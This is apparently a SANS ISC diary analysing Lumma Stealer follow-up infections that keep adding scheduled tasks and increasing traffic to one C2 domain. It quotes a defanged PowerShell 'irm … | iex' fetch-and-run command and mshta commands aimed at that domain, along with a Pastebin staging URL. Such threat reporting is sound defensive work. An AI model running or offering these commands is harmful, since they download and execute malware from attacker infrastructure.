Infection repeatedly adds scheduled tasks and increases traffic to the same C2 domain

    Published: 2026-01-14. Last Updated: 2026-01-14 18:17:20 UTC
    by Brad Duncan (Version: 1)
    0 comment(s)

    Introduction

    In recent weeks, Lumma Stealer infections have followed a specific pattern in follow-up activity. This pattern adds scheduled tasks for the same action, which increases traffic to the same C2 domain. This diary documents an example from one of these infections on January 14, 2026.

    Details

    After Lumma Stealer performs its data exfiltration, the infected Windows host retrieves information from a Pastebin link, which the infected host uses for a follow-up infection. So far, this follow-up infection has used .cc domains for its C2 traffic. Here is one such example from the beginning of January 2026.

    The image below shows an example of a Lumma Stealer infection from today.


    Shown above: Traffic from a Lumma Stealer infection today filtered in Wireshark.

    The follow-up infection from Lumma Stealer activity begins with a Pastebin URL, which is hxxps[:]//pastebin[.]com/raw/xRmmdinT seen as recently today, as January 14, 2026.


    Shown above: Pastebin URL used for the follow-up infection shown in a web browser.

    The Pastebin URL returns the following PowerShell command:

    irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex

    This leads to several follow-up HTTPS requests for hxxps[:]//fileless-market[.]cc/ as time progresses. These HTTPS requests are caused by commands for mshta hxxps[:]//fileless-market[.]cc/ that in turn generate a scheduled task to perform the same command.

    This activity appears to build on itself. Almost 11 hours after an initial infection, the infected Windows host in my lab had 31 scheduled tasks with different names, but they all had the same trigger and action: running the mshta command for hxxps[:]//fileless-market[.]cc/.


    Shown above: Task scheduler for the infected Windows host showing multiple tasks generated by this infection after several hours.

    This generated more C2 traffic to fileless-market[.]cc as the hours passed. On January 14, 2026 at 16:02 UTC, I saw 33 TCP streams for HTTPS sessions to this C2 server.


    Shown above: 33 TCP streams for HTTPS sessions to fileless-market[.]cc from this infection.

    Final Words

    This C2 activity seems a bit unusual. I've never seen it before. I chatted about this with some of the other handlers, and they did not remember seeing this type of increase in scheduled tasks and post-infection traffic. If anyone else has noticed activity like this, please leave a comment!

    Bradley Duncan
    brad [at] malware-traffic-analysis.net

    Keywords: Lumma Lumma Stealer
    0 comment(s)
    ISC Stormcast For Wednesday, January 14th, 2026 https://isc.sans.edu/podcastdetail/9766

      Comments

      Login here to join the discussion.


      Diary Archives